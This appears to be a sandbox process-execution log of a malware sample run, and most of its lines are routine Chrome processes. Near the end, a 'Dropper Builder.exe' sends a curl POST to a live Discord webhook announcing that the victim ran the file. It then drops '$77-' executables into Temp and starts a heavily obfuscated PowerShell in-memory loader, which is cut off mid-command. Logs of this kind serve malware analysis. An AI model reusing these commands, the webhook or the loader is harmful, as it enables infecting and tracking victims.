"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5112 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3380 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3468 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4248 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5320 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5460 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5676 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5976 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6084 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6376 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6552 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6712 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5840 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6992 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6404 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=7120 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=7104 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=7380 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=7220 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7720 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6876 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=7988 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=8136 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=8320 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=8496 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=8632 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=8680 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=8976 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=8480 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=9400 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=9456 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=8656 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=9688 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=9612 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=10004 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=10128 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=6116 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=10064 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=6100 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=10060 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=9008 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=9432 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=5792 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=9736 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=9024 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=5616 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=10108 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=9028 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=10628 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=8072 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=4992 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=10356 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=11140 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=11144 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=8380 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=11524 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --mojo-platform-channel-handle=11704 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --mojo-platform-channel-handle=11504 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=12004 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --mojo-platform-channel-handle=12172 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --mojo-platform-channel-handle=12300 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=12336 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --mojo-platform-channel-handle=12468 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --mojo-platform-channel-handle=12816 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=12184 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2720 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9296 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2744 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Users\Admin\Downloads\Dropper Builder.exe
"C:\Users\Admin\Downloads\Dropper Builder.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\SysWOW64\curl.exe
curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
C:\Users\Admin\AppData\Local\Temp\$77-install.exe
"C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:RuIdwLFZdpne{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UVutwbAoqZVCtH,[Parameter(Position=1)][Type]$igcSbrqbOz)$apNYbVnfyTC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+'e'+'g'+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+'em'+'o'+''+[Char](114)+'y'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+'t'+'eTy'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+','+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+'A'+'nsi'+[Char](67)+'la'+'s'+''+[Char](115)+','+[Char](65)+''+'u'+''+'t'+'oC'+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$apNYbVnfyTC.DefineConstructor('R'+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+'c'+''+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$UVutwbAoqZVCtH).SetImplementationFlags('R'+'u'+'n'+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+'ged');$apNYbVnfyTC.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+''+'i'+''+[Char](100)+''+'e'+''+'B'+'yS'+[Char](105)+''+[Char](103)+',N'+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+'o'+''+'t'+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+'l'+'',$igcSbrqbOz,$UVutwbAoqZVCtH).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+'i'+''+'m'+''+'e'+''+','+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $apNYbVnfyTC.CreateType();}$wrKoaJuctLjFo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 